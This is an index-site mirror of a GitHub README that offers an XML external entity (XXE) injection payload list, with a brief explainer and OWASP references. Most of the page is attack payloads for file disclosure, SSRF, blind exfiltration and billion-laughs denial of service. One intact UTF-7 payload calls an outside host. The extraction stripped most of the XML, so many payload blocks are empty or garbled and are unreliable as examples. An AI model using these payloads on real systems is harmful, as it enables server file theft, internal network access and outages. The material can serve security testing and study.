Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/payloadbox/xxe-injection-payload-list

🎯 XML External Entity (XXE) Injection Payload List
https://github.com/payloadbox/xxe-injection-payload-list

bug-bounty bugbounty cyber-security cybersecurity hacking information-security infosec payload payloads web-application-security websecurity websecurity-reference xml xml-entity xxe xxe-example xxe-injection xxe-payload xxe-payload-list xxe-payloads

Last synced: 20 days ago
JSON representation

🎯 XML External Entity (XXE) Injection Payload List

Awesome Lists containing this project

README 

        
### XML External Entity (XXE) Injection Payload List



       




In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks. 



#### What is XML external entity injection?



XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.



In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks. 



 






There are various types of XXE attacks: 



|XXE Attack Type               |Description                          |

|----------------|-------------------------------|

|Exploiting XXE to Retrieve Files| Where an external entity is defined containing the contents of a file, and returned in the application's response. |

|Exploiting XXE to Perform SSRF Attacks| Where an external entity is defined based on a URL to a back-end system. |

|Exploiting Blind XXE Exfiltrate Data Out-of-Band| Where sensitive data is transmitted from the application server to a system that the attacker controls. |

|Exploiting blind XXE to Retrieve Data Via Error Messages | Where the attacker can trigger a parsing error message containing sensitive data. |



##### XML External Entity (XXE) Injection Payloads



###### XXE: Basic XML Example



```



 John

 Doe



```



###### XXE: Entity Example



```



 ]>

 

  John

  &example;

 

```



###### XXE: File Disclosure



```



 ]>



 John

 &ent;



```



###### XXE: Denial-of-Service Example



```



  

  

  

  

  

  

  

  

  

]>

&lol9;

 ```

 

###### XXE: Local File Inclusion Example

 

 ```

 



]>&xxe;

 ```

 

###### XXE: Blind Local File Inclusion Example (When first case doesn't return anything.)

 

 ```



]>&blind;

 ```

 

###### XXE: Access Control Bypass (Loading Restricted Resources - PHP example)



```



]>

∾

```



###### XXE:SSRF ( Server Side Request Forgery ) Example



```



]>&xxe;

```



###### XXE: (Remote Attack - Through External Xml Inclusion) Exmaple



```



]>

3..2..1...&test

```



###### XXE: UTF-7 Exmaple



```



+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4

+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+

+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4

```



###### XXE: Base64 Encoded



```

 %init; ]>

```



###### XXE: XXE inside SOAP Example



```



  

     %dtd;]>]]>

  



```



###### XXE: XXE inside SVG



```



    



```



#### References :

 

👉 [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing)



👉 [XML External Entity Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html) 



👉 [Testing for XML Injection (OTG-INPVAL-008)](https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008))